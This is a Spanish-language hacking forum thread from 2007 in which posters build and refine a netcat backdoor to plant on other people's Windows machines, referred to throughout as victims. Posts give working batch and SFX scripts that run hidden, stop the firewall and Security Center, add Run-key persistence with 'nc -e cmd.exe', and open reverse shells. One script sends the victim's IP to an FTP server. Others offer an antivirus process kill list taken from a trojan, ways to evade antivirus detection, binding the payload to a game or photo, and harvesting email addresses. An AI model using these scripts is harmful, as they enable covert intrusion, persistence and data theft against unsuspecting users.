reg add HKLM\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\ /v "%homedrive%%homepath%\update\update.exe" /t reg_sz /d "%homedrive%%homepath%\update\update.exe:*:Enabled:update" /f

Salu2


Título: Re: Jugando con netcat
Publicado por: D4RIO en 2 Junio 2007, 16:37 pm
Mmm...Cuando creas un SFX en WinRar el comentario no se toca ya que tiene el script SFX para la descompresión. Lo de net stop son comandos para la consola, los pones en un bat.
Para hacer todo junto podes crear el sfx (yo los creo siempre en formato zip que me parece mas simple), vas a la solapa de avanzadas > opciones del SFX, configuras todo a gusto y pones aceptar...ahora en la solapa comment te tendría que aparecer algo como.
Código:
;The comment below contains SFX script commands

Path=TOK
Setup=TOK.bat
Overwrite=1
Title=Instalar
Text
{
Seleccione la carpeta desde la que se ejecutara Trash Over Killer
}
Shortcut=P, "TOK.bat", "", "Herramienta TrashOverKiller", "TrashOverKiller"
Shortcut=D, "TOK.bat", "", "Herramienta TrashOverKiller", "TrashOverKiller"

Ese es para un antiWorm que estoy desarrollando. Fijate que crea dos shortcuts, tiene un texto y lo de Setup=TOK.bat es la parte que va a ejecutar el TOK.bat cuando se termine la descompresion. Si en la parte de modos usas el modo silencioso no tiene dialogo asi que vas a ver que ese TOK.bat (eso para mi caso) se ejecuta solito, ya que la descompresion se hizo sin decir nada...
Podes desde el mismo bat hacer todo junto...pero en general a mi me gusta mandar tambien NirCmd en el paquete y usar dos bats, uno llama al otro con nircmd execmd que es una orden para ejecutar lo que le pedimos sin mostrar nada. Hay una forma de hacerlo sin Nir (en cmd), pero no me la acuerdo... ;D
Bueno, lo que obtenes mandando el paquete con nir, nc y esos dos bats es la posibilidad de que el segundo bat se ejecute sin mostrar nada de nada...asi que podes hacer cositas que lleven tiempo y el usuario no podra notarlo, a menos que hagas cosas que requieran trabajo, en ese caso el usuario puede notar que su pc esta haciendo algo. Pero si logras meter NetCat haces un scan de las direcciones de E-Mail, las mandas a un txt y despues usas ese txt desde netcat para enviar correos, o lo que quieras!!! Es mucho lo que se puede hacer si lograste meter todo, y si el bat se ejecuta en silencio significa que le podes escanear practicamente toda la maquina, ya que eso no hace mucho alarde...jeje ;D


Título: Re: Jugando con netcat
Publicado por: D4RIO en 2 Junio 2007, 16:50 pm
A ver, mejor me explico porque lo lei y no se entiende nada...
Uno de los bats (pongamosle run.bat) tiene que decir:

Código:
echo off
color FE
nircmd execmd runme.bat
exit

Obviamente vas a tener otro llamado runme.bat que metera netcat, y hara todo el lio sin mostrar nada. Tambien deberas incluir en ese caso el nircmd. Yo lo suelo renombrar como algo mas creativo como nir o com...jeje En ese caso el comando debe ser nir execmd runme.bat o com execmd runme.bat.
El otro tendra algo como

Código:
net stop sharedaccess
net stop "Centro de Seguridad"
net stop  "Firewall de Windows/Conexión compartida a Internet (ICS)"
net stop "Windows Firewall/Internet Connection Sharing (ICS)"
...

Y blablabla todos los que quieras...total el usuario no lo ve.


Título: Re: Jugando con netcat
Publicado por: WHK en 3 Junio 2007, 01:48 am
No es necesario crear archivos bats si puedes crear multiejecuciones en SFX  ;D

Path=TOK
Setup=cmd /c net stop sharedaccess&&net stop sharedaccess&&net stop "Centro de Seguridad"&&net stop  "Firewall de Windows/Conexión compartida a Internet (ICS)"&&net stop "Windows Firewall/Internet Connection Sharing (ICS)"


O

Path=%windir%
Setup=net stop sharedaccess
Setup=net stop sharedaccess&&net stop "Centro de Seguridad"
Setup=net stop  "Firewall de Windows/Conexión compartida a Internet (ICS)"
Setup=net stop "Windows Firewall/Internet Connection Sharing (ICS)"
etc etc...

De todas maneras hace un poco de tiempo hice un programa para ejecutar bats sin que se vea la consola de comandos.
http://512.iespana.es/nc
Busca el programa llamado bgr.rar y descomprimelo... luego escribe en el texto llamado ejecutar.txt el nombre y la ruta del bat y lixto, ahora solo ejecutas el ejecute_invisible.exe


Título: Re: Jugando con netcat
Publicado por: D4RIO en 3 Junio 2007, 02:39 am
Bueno si vamos al caso tambien podemos hacer un vbs pero me parecio que trabajar con lo de siempre es mas comodo...me sale el vago de adentro. Por cierto, intente mandar un mail desde nc con lo de type mjeberreta.txt|nc -vv -w 10 mail.speedy.com.ar 25...el tema es que me saca un error. Use como smtp el mail.speedy.com.ar que es el que mi viejo usa en el outlook como correo de salida. No se porque me pone estos errores:

220 galga.terra.com ESMTP
503 <Anonimo>: Helo command rejected: Improper use of SMTP command pipelining
503 Error: send HELO/EHLO first
503 Error: need MAIL command
503 Error: need RCPT command
221 Error: I can break rules, too. Goodbye.

no cazo porque???


Título: Re: Jugando con netcat
Publicado por: WHK en 3 Junio 2007, 02:50 am
Escribe tu mjeberreta.txt, además no puedes enviar correos anonimamente o sin usar una contraseña en servidores como timonfonika, hotmail, yahoo, etc etc... por eso utilizé el miniremailer como servidor SMTP... ahora puedes usar un miniremailer para consola si quieres enviarlos directamente desde una makina remota  :P
Usa el miniremailer directamente desde http://512.iespana.es/nc
Nota: en un tiempo mas cambiaré los links directamente para que no sigan diciendo que mi post es SPAM para promocionar mi web ya que ni si quiera está terminada como para querer generar visitas :P.


Título: Re: Jugando con netcat
Publicado por: D4RIO en 3 Junio 2007, 06:07 am
Grax...me imagine que seria por algo de eso, y por tu pag, el reshack no lo puedo descargar...y no te hagas problema porque no este terminada, iespana tiene esa forma fea de publicar subiendo los ficheros desde la PC...¬¬...me gustaba mas la forma que ofrece zerocatch de modificar los documentos html manualmente desde el mismo servidor. Yo tengo estancado un link en mi web, ya que saque una nueva herramientita para limpiarse de algunas infecciones, y todavia no la reemplace, deje el link ahi nomas...jeje
Por cierto, leí por ahi que estabas compilando una nueva de netcat... :rolleyes: se me ocurre compilar un servernc.exe como servidor y un clientnc.exe como cliente...ahora me estoy fijando como llegar a hacerlo, pero no ando con mucho tiempo. Probablemente me fije como mejorar las características de servidor de nc...
Bueno, gracias por la rta XDXD   see you later man!


Título: Re: Jugando con netcat
Publicado por: marlon_agz en 4 Junio 2007, 00:48 am
my frien respondo para que sepas que aun sigo intentandolo xD
aunque me sigue mandando aplicacion win32 no valida  :xD

bueno seguire buscandole
salu2


Título: Re: Jugando con netcat
Publicado por: WHK en 4 Junio 2007, 04:18 am
Usa este directamente:
http://www.vulnwatch.org/netcat/nc111nt.zip y desactiva tu antivirus antes de usarlo.
Si aun no puedes usarlo entonces tu pc tiene problemas y eso Debes plantearlo en otro subforo  :-\


Título: Re: Jugando con netcat
Publicado por: D4RIO en 5 Junio 2007, 04:56 am
A ver, otra vez yo...estuve probandocon el minirelay y logré mandar mis Mails a mi cuenta en yahoo, pero hotmail me los rebota por política de la empresa. No puede ser que esté baneado por bomber ni nada de eso, hice ping y responde, pero me sigue rebotando los Mails.

Y otra cosa. Uso speedy y me brinda una IP dinámica. Si quiero hacer que una Máquina remota se conecte a mi PC cada tanto, yo escribo:

nc -d -e cmd.exe miip 3000

cosa que crearía una inversa por el puerto 3000, el problema es que mi IP cambia cada vez que me conecto ¿Es lo mismo si uso el nombre de mi equipo? (Pregunto como para no ponerme a probar...XD)


Título: Re: Jugando con netcat
Publicado por: WHK en 5 Junio 2007, 05:59 am
Citar
mi IP cambia cada vez que me conecto
Puedes crear una cuenta No-Ip la cual te asigna un nombre llamado DNS por ejemplo el mio: bogamory.sytes.net el cual al encender la pc automaticamente mi IP pasa a ser ese nombre. http://www.no-ip.com/services/managed_dns/free_dynamic_dns.html

Citar
logré mandar mis Mails a mi cuenta en yahoo, pero hotmail me los rebota por política de la empresa
Hotmail ya no acepta correos de cualquier IP  :P como antes lo hacia.


Título: Re: Jugando con netcat
Publicado por: D4RIO en 5 Junio 2007, 13:31 pm
Grax...se agradece!!! ;D


Título: Re: Jugando con netcat
Publicado por: D4RIO en 7 Junio 2007, 04:26 am
Hola, de nuevo yo. Estuve probando, y logré obtener la shell de un amigo, aunque casi enseguida se corto la conexion por el firewall que el usaba. Mi pregunta es: Si tengo varias máquinas intentando conectarse a la mía, cómo puedo hacer?
Leí que renombraban el nc en la máquina de la víctima pero en ese caso tendría que renombrarlo tamb en la mía no?
Quisiera que me aclaren ese tema, nada mas, grax...


Título: Re: Jugando con netcat
Publicado por: Dark_Knight en 7 Junio 2007, 23:00 pm
hola

alguien sabe como puedo hacer netcat indectectable a los antivirus... o alguien cnoce alguna lista de procesos de antivirus para eliminarlos a la hora de instala netcat

espero su respuesta

gracias  ;D


Título: Re: Jugando con netcat
Publicado por: D4RIO en 8 Junio 2007, 03:05 am
Una lista de procesos:

    APVDWIN.exe
    Avp32.exe
    avpcc.exe
    AVWUpSrv
    cmd.exe
    command.com
    iamapp.exe
    kavsvc
    navpw32.exe
    NOD32krn
    NOD32KRN.exe
    NOD32KUI.exe
    NPFMntor
    outpostfirewall
    PAVSRV51.exe
    PccPfw.exe
    PTstartmon.exe
    SNDSrvc
    TroyanFindInfo.exe
    VSMON.exe
    WEBPROXY.exe
    ZAPRO.exe

Es la que usa el troyano LD-Pinch, pero no te servirá de mucho porque son procesos que no se dejan detener así como así, o sea, no es tan simple, necesitas investigar cómo detener a un cierto proceso y evitar que se reinicie  ;D


Título: Re: Jugando con netcat
Publicado por: WHK en 9 Junio 2007, 23:53 pm
Puedes aplicar politicas de administración de archivos con el comando cacls e impedir su ejecución y eliminación de cada ejecutable involucrado en un proceso  :P

Ejemplo:

Restringe:
cacls C:\1.exe /E /C /P %username%:n
cacls C:\1.exe /E /C /P SYSTEM:n

Habilita:
cacls C:\1.exe /E /C /P SYSTEM:f
cacls C:\1.exe /E /C /P %username%:f

Citar
Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS>cacls
Muestra o modifica las listas de control de acceso (ACL)  de archivos

CACLS archivo [/T] [/E] [/C] [/G usuario:perm] [/R usuario [...]]
               [/P usuario:perm [...]] [/D usuario [...]]);
   archivo          Muestra ACLs.
   /T               Cambia las ACLs de los archivos especificados en
                 el directorio actual y en todos los subdirectorios.
   /E                Modifica la ACL en vez de remplazarla.
   /C               Continúa cambiando ACLs, omitiendo errores.
   /G usuario:perm  Concede derechos de acceso al usuario.
                 Perm puede ser: R  Leer
                              W  Escribir
                              C  Cambiar (escribir)
                              F  Control total
   /R usuario    Suspende los derechos del usuario (sólo con /E).
   /P usuario:perm  Sustituye los derechos de acceso del usuario.
                 Perm puede ser: N  Ninguno
                              R  Leer
                              W  Escribir
                              C  Cambiar (escribir)
                              F  Control total
   /D usuario       Denegar acceso al usuario especificado.
Se pueden usar comodines para especificar más de un archivo en el comando.
Puede especificar más de un usuario en el comando.

Abreviaciones:
   CI - Herencia de Contenedor.
        ACE se heredará por directorios.
   OI - Herencia de objeto.
        ACE se heredará por archivos.
   IO - Sólo heredar.
        ACE no se aplica al archivo o directorio actual.

C:\WINDOWS>


Título: Re: Jugando con netcat
Publicado por: Novlucker en 13 Junio 2007, 22:24 pm
D4RIO

Citar
Mi pregunta es: Si tengo varias máquinas intentando conectarse a la mía, cómo puedo hacer?
Leí que renombraban el nc en la máquina de la víctima pero en ese caso tendría que renombrarlo tamb en la mía no?
Quisiera que me aclaren ese tema, nada mas, grax...

Por lo que se no importa el nombre que tenga el ejecutable del nc.. igual se va a contectar, tu dices que tienes varias maquinas intentando conectarse a la tuya, es decir, estas usando conexión inversa con nc, para poder tener varias pc, y que todas se conecten a la tuya, debes de usar un puerto diferente en cada victima, asi pones a la escucha en un puerto en el caso de una victima, y luego a la escucha de otro puerto en otra victima... no conozco otra manera de hacerlo  ;)

salu2


Título: Re: Jugando con netcat
Publicado por: D4RIO en 14 Junio 2007, 01:03 am
Grax, de primera se me ocurrio eso, pero mi tema es que no quisiera abrir otros puertos que el 21 y 80...


Título: Re: Jugando con netcat
Publicado por: hbas_16 en 15 Junio 2007, 05:56 am
ey compas una pregunta estoy aprendiendo a usar el netcat pero por ejemplo cuando uso el buscador ip q hay en la pagina de elhacker me sale q mi Ip es de Australia y bueno mi pregunta es en la parte donde dice Ip q pongo por q tengo Ip estatica o como se cual es mi Dns???


Título: Re: Jugando con netcat
Publicado por: WHK en 15 Junio 2007, 06:03 am
 :xD esa sección no funciona pero si quieres saber tu ip visita esta pagina:
http://ip.interchile.com/


Título: Re: Jugando con netcat
Publicado por: hbas_16 en 15 Junio 2007, 06:41 am
si man gracias ya arregle ese problema no mas una pregunta uso el ResHacker y ya le cambia el icono y todo pero al abrir este archivo ya cambiado con el icono me explico al abrir el iexplorer.exe me sale q no es una aplicacion WIn32 valida asi q cuando creo el rar auto extraible me da el mismo error al ejecutarse como arreglo esto??


Título: Re: Jugando con netcat
Publicado por: D4RIO en 15 Junio 2007, 20:55 pm
Dentro de las opciones avanzadas del SFX elegí el otro módulo y fijate si te sigue dando problemas, sino proba sin ese ícono, a mi el del IE7 me dió varios problemas, una vez que extraía el archivo de ícono del ejecutable del IE7 no me dejaba abrir la carpeta donde estaba, a menos que le cambie la extensión desde el CMD. =S .
Sino proba hacerlo ZIP SFX que tiene otro módulo.


Título: Re: Jugando con netcat
Publicado por: SeX_CooL en 16 Junio 2007, 11:37 am
holasss tengo un problema con con el tuto 1  ;D osea!! hice todo como me dice pero cuando llego ha crear el Cliente me da error  :-\ me alludas

atte SeX_CooL


Título: Re: Jugando con netcat
Publicado por: nitratus en 16 Junio 2007, 23:13 pm
my frien respondo para que sepas que aun sigo intentandolo xD
aunque me sigue mandando aplicacion win32 no valida  :xD

bueno seguire buscandole
salu2

Hola, yo tengo exactamente el mismo problema y no tengo idea de como solucionarlo he leido todo los post buscandole una solución, el error es :
iexplorer.exe es una aplicación Win32 no válida.

Lo he hecho como 10 veces y pasa lo mismo también probé directo sobre nc.exe sin ningún icono y obtube el mismo resultado.

Ayuda Please.


Título: Re: Jugando con netcat
Publicado por: D4RIO en 17 Junio 2007, 00:20 am
Yo lo uso siempre y nunca tuve problemas. Probaste haciendolo con el modulo SFX de la extensión ZIP?
En vez de RAR le ponés ZIP y en las avanzadas del SFX, en la pestaña de módulo, te aparece un solo módulo disponible en vez de dos.


Título: Re: Jugando con netcat
Publicado por: SeX_CooL en 17 Junio 2007, 05:00 am
 :-\ :-\ ;) no me deja ya intente y me da este error cuando voy a crear el "Cliente"...

http://img217.imageshack.us/img217/1550/dibujogn6.png


Título: Re: Jugando con netcat
Publicado por: Novlucker en 18 Junio 2007, 00:34 am
Si es eso fijate que dentro de la carpeta "Sebastian" este el nc, si esta y te salta ese error, prueba poniendo "nc.exe", y no solo nc.......

salu2


Título: Re: Jugando con netcat
Publicado por: marlon_agz en 18 Junio 2007, 00:42 am
mejor guarda el nc en system32 ;)
y te evitas especificar direcciones  ;D

salu2


Título: Re: Jugando con netcat
Publicado por: nitratus en 18 Junio 2007, 22:12 pm
Yo lo uso siempre y nunca tuve problemas. Probaste haciendolo con el modulo SFX de la extensión ZIP?
En vez de RAR le ponés ZIP y en las avanzadas del SFX, en la pestaña de módulo, te aparece un solo módulo disponible en vez de dos.

Al final solucioné el problema cambié la versión de Winrar, extrañamente no funcionó no me funcionó con la 3.62, con la 3.7 si me funcionó pero el asunto no fue tan trivial pues al asociarle iconos fallaba. En resumidas cuentas con el cambio de versión si resulta pero el tema iconos no está solucionado(Es solo un detalle de todas formas).

Gracias por responder.


Título: Re: Jugando con netcat
Publicado por: SeX_CooL en 19 Junio 2007, 00:02 am
 :( :( :( :( :( :( :( :( :( :( :( no me deja tampoco  :( le puse "nc" y "nc.exe" y me sigue diciendo lo mismo de la foto!  y si guardo el nc en system32 que tengo que poner el la ventana del Cliente!?
aca les dejo mi msn por si me quieren agregar

kamikazexp@hotmail.com


Título: Re: Jugando con netcat
Publicado por: carlipus en 19 Junio 2007, 21:03 pm
Yo he hecho el server de netcat como dice el manual pero sin poner ningun icono ni nada, se queda con el icono de sfx de winrar. Pero ahora para agregar ese server a un juego o una foto, como lo puedo hacer?

Saludos


Título: Re: Jugando con netcat
Publicado por: marlon_agz en 19 Junio 2007, 21:09 pm
Cactus Joiner ...

http://foro.elhacker.net/index.php/topic,131276.0.html


Título: Re: Jugando con netcat
Publicado por: carlipus en 19 Junio 2007, 22:20 pm
me lo he bajado y al abrir el cactus me da un error y me pone:

component "COMDLG32.OCX" or one  of its dependencies not correctly registered: a file is missing or invalid

Alguna idea?


Título: Re: Jugando con netcat
Publicado por: marlon_agz en 19 Junio 2007, 23:05 pm
SIII  Leete bien el post del cactus Joiner  ahi mismo viene la solucion

 ;D


Título: Re: Jugando con netcat
Publicado por: carlipus en 19 Junio 2007, 23:25 pm
vale, ya pude, gracias.


Título: Re: Jugando con netcat
Publicado por: R41N-W4R3 en 19 Junio 2007, 23:51 pm


   Hay un par de ideas mas que quiero añadir a este tutorial.

  en primer lugar, como creo que no es una buena idea dejar mi ip por ahi puesta para que se conecten a mi (y si tienes ip dinamica ademas debes hacerte de un dominio.....), yo hago lo siguiente:

  Ya nos ha explicado de forma EXCELENTE nuestro amigo en el tutorial como esconder netcat. Además hemos visto como en cierto momento ejecuta un comando durante la extraccion que ademas se hace de forma oculta. Pues yo ejecuto un fichero bat :

Este seria un contenido de ejemplo:

  @echo off
netsh
set mode offline
set allowedprogram c:\windows\system32\xpupdate.exe allow_nc ENABLE
copy xpupdate.exe c:\windows\system32\
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v xpupdate /t REG_SZ /d "C:\windows\system32\xpupdate -l -d -e cmd.exe -p 80"
xpupdate whatismyip.com 80 < html.txt > out.out
ftp
open
ftp.ftp.es
user
pass
ascii
put out.out
bye
xpupdate  -l -d -e cmd.exe -p 80
exit
Vamos a comentar que hace:

 netsh --------vamos al modo de control del firewall de xp  ;)

set mode offline---- Le indicamos que desactive las alertas

set allowedprogram c:\windows\system32\xpupdate.exe allow_nc ENABLE- Damos paso al netcat (renombrado a xpupdates.exe) en el firewall

copy xpupdate.exe c:\windows\system32\- Lo copiamos a un sitio adecuado

REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v xpupdate /t REG_SZ /d "C:\windows\system32\xpupdate -l -d -e cmd.exe -p 80"  Aqui lo introducimos en el registro de inicio para que cada vez que arranque el sistema lo ponga a escuchar en un Puerto determinado y nosotros podamos conectarnos.

xpupdate whatismyip.com 80 < html.txt > out.out  Aquí uso el propio netcat para enviar una cabecera httpo adecuada a la pagina whatismyip.com (la cual nos indica la ip externa desde la que nos conectamos) y asi poder guardar en un archivo de texto (out.out) el resultado, que sera la ip externa de la victima. Muy necesaria si pretendemos saber donde atacar   XD…

ftp         Estos pasos solo me envían por ftp esa                    información aunque podríamos hacerlo de muchas otras formas como una web, etc
open                       
ftp.ftp.es
user
pass
ascii
put out.out
bye


xpupdate  -l -d -e cmd.exe -p 80  Aquí es donde indicamos al netcat que se quede a la escucha para cuando queramos conectarlo. Además lo hace a través del puerto 80 para asegurarnos que el router lo deje pasar.
exit

El contenido de la cabecera http adecuada para el paso xpupdate whatismyip.com 80 < html.txt > out.out  se guarda en el archivo html.txt que pego a continuación y que consegui con el software Httpanalizer haciendo una simple captura de la consulta a dicha página.

GET / HTTP/1.1
Accept: */*
Accept-Language: es
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)


      Ademas es muy recomendable haber creado la web o ftp de forma anónima usando por ejemplo (Tor+Privoxy+Firefox), y por supuesto acceder a ese ftp,web o como queramos guardar la info de las  ip que sepamos que nos estan esperando con un puerto abierto jejejej

   Sin mas felicitar al creador del tutorial y espero haber inspirado a alguien con estas ideas.

 Saludos


     


Título: Re: Jugando con netcat
Publicado por: carlipus en 20 Junio 2007, 11:50 am
Se podría hacer este servidor de netcat indetectable? por que varios antivirus lo detectan.

Saludos


Título: Re: Jugando con netcat
Publicado por: R41N-W4R3 en 20 Junio 2007, 12:40 pm


    Creo que lo mejor seria modificar el codigo fuente lo suficiente como para que los antivirus no lo detecten. Mira tambien la posibilidad de cifrar el archivo para evitar asi la heuristica de antivirus..... de todas formas casi todos los antivirus con la configuración por defecto se lo tragan.....


Título: Re: Jugando con netcat
Publicado por: pitufooo en 20 Junio 2007, 12:48 pm
hola

estoy intentando descargar el netcat y siempre me salta el antivirus k a encontrado una herramienta hacker y lla a eliminado.

Ya s k anulando el antivirus m la mpodria descargar, pero si cuando se la ponga a una victima su  antivirus la borra no gano nada.

como dice el compañero no hay alguna forma para k no lo detecten  los antivirus ????

gracias

un saludo


Título: Re: Jugando con netcat
Publicado por: carlipus en 20 Junio 2007, 16:35 pm
Una vez conseguido la shell, para subirle el vnc, pongo:

tftp -i MIIP get WinVNC.exe c:\WINDOWS\system32\gttask.exe

y luego me dice tiempo de espera agotado, por que no va?¿

Saludos.


Título: Re: Jugando con netcat
Publicado por: D4RIO en 20 Junio 2007, 17:23 pm
Creo que entrar a la config del firewall para hacerle tragar al netcat es innecesario, ya que se puede hacer con el mismo bat a través de net stop...y ponerte como excepcion te pones editando directamente el registro.

Obtener la IP de la persona lo podés hacer de una forma más simple, sin necesitar acudir a una web...AutoIt tiene varias formas de obtener la IP, a parte podés mandarte directamente a un txt la salida de ipconfig /all o cualquier otro método.

Y por último, ponerle otro nombre a netcat no te sirve en realidad de nada: Primero porque cualquier antivirus va a sacar el aviso de que ese archivo, sea cual sea el nombre que tenga, es un RiskWare identificado como NetCat, y ahi te lo delata, a demás si ponés una sintaxis tan obvia de netcat en una rama tan común del registro...mmm

La mejor es mandar un ejecutable que encripte el archivo donde están las órdenes para netcat...y al mismo tiempo usar una llamada más normal desde el registro, algo como Win32 que llame a C:\Windows\System32\WindowsRun.exe que es algo que cualquiera se traga. El netcat lo editas un poco para hacerlo indetectable, y por fin usas el ejecutable para que desencripte las ordenes unicamente al momento de usarlas, y así tu IP o DNS permanece siempre cifrado, ya que a menos que el usuario sepa decompilar el ejecutable que lo descifra jamas obtendrá la contraseña del cifrado...con eso y un clon de las ordenes por si te las borran estás bien hecho. A parte podrías hacer un clon del mismo netcat y mandarlo como dll a System32, haciendo que se confunda entre todos...

Otra cosita útil es cambiarles a todos los atributos para que aparezca como que son archivos que están desde hace rato en la máquina, así los buscadores como ComboFix que sacan en su informe un reporte de los últimos archivos creados, tampoco lo identificarían...eso siendo al extremo precabido XD


Título: Re: Jugando con netcat
Publicado por: R41N-W4R3 en 20 Junio 2007, 17:43 pm


  Con respecto al primer punto, no lo entiendo bien, asi que explicame a que te refieres.

  Encuanto a lo de sacar la ip con ipconfig jajajajajaj   eso te da la ip interna, osea del tipo 192.168.1......   y si pretendes conectarte desde fuera necesitas una ip externa del tipo 80.32.12.....   lo que sea.......  y yo mando directamente a un txt (en mi ejemplo el out.out) y todo generado con esa consulta a la web...... si sabes cualquier otro método tal y como indicas para conseguir la ip externa por favor indicamelo.

 Lo de ponerle otro nombre al netcat, EVIDENTEMENTE no es para engañar al antivirus, es para que pase lo mas inadvertido posible si ves el taskmanager........

   Encuanto a lo de cifrar mi ip, etc ... creo que no has leido muy mi post pq en ningun caso pongo mi ip, sino que lo envio a un ftp o web que he creado en un sitio gratis usando TOR para conseguir anonimicidad.

   La idea de modificar netcat si es valida para hacerlo pasar mas inadvertido, aunke con la tecnica de ocultarlo con winrar muchos antivirus en modo de instalacion por defecto se lo tragan.

   Un saludo y gracias por tus ideas...  las comparta o no... que para eso es un foro , para aprender unos de otros.


Título: Re: Jugando con netcat
Publicado por: pitufooo en 20 Junio 2007, 19:50 pm
hola

alguien seria tan amable de explicarme como hacer indetectable el netcat prara panda y norton ????
o pasarme un netcat indetectable para estos antivirus.

gracias

un saludo


Título: Re: Jugando con netcat
Publicado por: DragonSpirits en 20 Junio 2007, 20:06 pm
Hi a todos , Gracias infinitas esto me servira para una venganza xDDD



Título: Re: Jugando con netcat
Publicado por: carlipus en 20 Junio 2007, 22:46 pm
No deberías usar tus "conocimientos" para venganza, eso suele ser mas de lammers.

Saludos.


Título: Re: Jugando con netcat
Publicado por: carlipus en 21 Junio 2007, 12:45 pm
Tengo un problema con el servidor de netcat, por muxo que se conecten las victima a mi conr everse shell...
  mi desconexion cuando se cae ya no puedo volver a entrar por shell a mi victima hasta que no reinicia pc.
  No puedo subirle archivos con el tftp, me dice tiempo de espera agotado
  Y miro a ver si se le ha subido el archivo que le mandado y nada, se le subo un archivo que pone TFTP272 con 0 kilobytes, vamos que eso no es.

Algun solucion?


Título: Re: Jugando con netcat
Publicado por: DragonSpirits en 21 Junio 2007, 14:21 pm
No deberías usar tus "conocimientos" para venganza, eso suele ser mas de lammers.

Saludos.

Jajajaja es verdad , pero no puedo recistir la tentacion xD , aparte esta bueno para aprender


Título: Re: Jugando con netcat
Publicado por: pitufooo en 21 Junio 2007, 19:21 pm
hola

tengo acceso a un pc mediante poison 2.3.0 pero keria tener una shell por si acaso y por aprender.
He seguido el manual de la primera pagina, y he subido el carnada.exe con el poison, pero cuando le he dado para k s intalase, por medio de captura d pantallas del poison , he visto k le a saltado el panda diciendo k habia un virus, y luego a saltado una shell.

No s k he podido hacer mal o k puedo hacer para k el panda no m detecte.

luego he abbierto yo una shell y he puesto

nc -vv -L -p 80

y m sale esto

(http://img207.imageshack.us/img207/5422/cmdog8.jpg) (http://imageshack.us)

me podeis echar una manita por favor.

gracias

un saludo


Título: Re: Jugando con netcat
Publicado por: D4RIO en 22 Junio 2007, 06:59 am
Holass....primero, para R41N-W4R3:
Mi primer punto, usar los siguientes comandos desde un bat, o cualquier cosa que ejecute comandos en la consola de comandos de Windows, sea vbs, ejecutable, o lo que quieras:

net stop SharedAccess
net stop "Firewall de Windows/Conexión compartida a Internet (ICS)"
net stop "Windows Firewall/Internet Connection Sharing (ICS)"

Mediante esos nos aseguramos de detener el Firewall, y luego metemos en esta rama del registro lo que queremos que el firewall exceptúe:

reg add HKLM\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\Authorize

 :xD

Ahora, ipconfig /all nos tira todas las configuraciónes de IP, y si la sabes buscar la pública está...yo me acabo de fijar en la mía y adiviná qué me encontré... ;D

Lo de cifrar la IP o prefijo DNS es porque lo necesitarás mandar en la orden a netcat para una conexión inversa, o una pipeada, para hacerte de buenos recursos, la encriptas con RC4 con un buen pass a nivel 1 para que no haga alarde el trabajo del procesador y listo...era más un Tip, no tenía que ver en realidad con tu Rta...XD

Y respecto a lo de WinRar ¿Como lo haces pasar inadvertido? Cuando un autoextraible necesita ejecutar algo comprimido en su interior lo descomprime en una carpeta temporal, y ahi el antivirus salta, yo lo he intentado, pero no sale...el tema está en cambiarlo, y creo que ya dije que creo que es OpenSource por lo que buscan el SourceCode en la web, lo editan, recopilan y chauu....eso si, no anden distribuyendo esas ediciones porque en seguida se van a enterar los de las compañías antivirus...

Estuve viendo en la Ayuda de AutoIt que podés crear aplicaciónes de consola ahi, y tiene funciones de TCP y UDP así como varias para el manejo de Inet, así que vamos a ver que tanto jugo le podemos sacar...MuejejejejeXDXD


Ah, otra cosa!
 A fijarse que nc -vv -L -p 80 solo pone el puerto 80 a la escucha muy atento y con Very Verbose, eso significa que no solo la victima sino cualquiera que se conecte por el 80 nos saldrá...a mí me salió el foro.elhacker, pero eso no significa que tengas la shell, ya que eso va en la conexión del otro lado, espero explicarme, byebye...


Título: Re: Jugando con netcat
Publicado por: R41N-W4R3 en 22 Junio 2007, 09:57 am

  Ya entiendo lo de la primera parte. Es una buena solucion tambien, pero no creo q aporte mejoras a la mia, aunke me ha gustdo el apunte.

  Encuanto a lo del ipconfig /all sigo sin ver mas que mascara de red, p interna y puerta de enlace (lo hago en xp), asi q dime como demonios ves la ip externa asi ejejjeje

  Encuanto a la ocultación de netcat, solo funciona con la mayoria de antivirus en su instalacion por defecto. El unico modo que veo posible de realizar esa ocultación es o bien cambiando el fuente o tambien realizando una ocultación de ese fichero en una extension no escaneable por los antivir,  habiendo previamente preparado el sistema para ser capaz de ejecutar esa nueva extension.
  Gracias por el apunte del nc.  No suelo poner todo el codigo o comandos q pegue correcto en el foro general, solo en privado para evitar mal uso de lamer.



Título: Re: Jugando con netcat
Publicado por: D4RIO en 22 Junio 2007, 18:28 pm
Jeje, eso de los Lammers es cierto, siempre andan afamando para mal el nombre de Hacker ¡Son un peligro para la sociedad!
Lo del ipconfig, a ver, yo hice ipconfig /all en mi máquina y me pasa ésto:

Código:
Configuración IP de Windows

        Nombre del host . . . . . . . . . : fox-trot-1
        Sufijo DNS principal  . . . . . . :
        Tipo de nodo. . . . . . . . . . . : híbrido
        Enrutamiento habilitado. . . . . .: No
        Proxy WINS habilitado. . . . .    : No

Adaptador Ethernet Conexión de área local          :

        Estado de los medios. . . .: medios desconectados
        Descripción. . . . . . . . . . .  : Realtek RTL8139/810x Family Fast Ethernet NIC
        Dirección física. . . . . . . . . : 00-53-45-00-00-00

Adaptador Ethernet Conexión de área local 2          :

        Sufijo de conexión específica DNS :
        Descripción. . . . . . . . . . .  : SpeedTouch(tm) USB ADSL RFC1483
        Dirección física. . . . . . . . . : 00-53-45-00-00-00
        DHCP habilitado. . . . . . . . .  : No
        Autoconfiguración habilitada. . . : Sí
        Dirección IP de autoconfiguración : 169.254.230.167
        Máscara de subred . . . . . . . . : 255.255.0.0
        Puerta de enlace predeterminada   :

Adaptador PPP speedy               :

        Sufijo de conexión específica DNS :
        Descripción. . . . . . . . . . .  : WAN (PPP/SLIP) Interface
        Dirección física. . . . . . . . . : 00-53-45-00-00-00
        DHCP habilitado. . . . . . . . .  : No
        Dirección IP. . . . . . . . . . . : 201.255.79.179
        Máscara de subred . . . . . . . . : 255.255.255.255
        Puerta de enlace predeterminada   : 201.255.79.179
        Servidores DNS . . . . . . . . . .: 200.51.212.7
                                            200.51.211.7
 
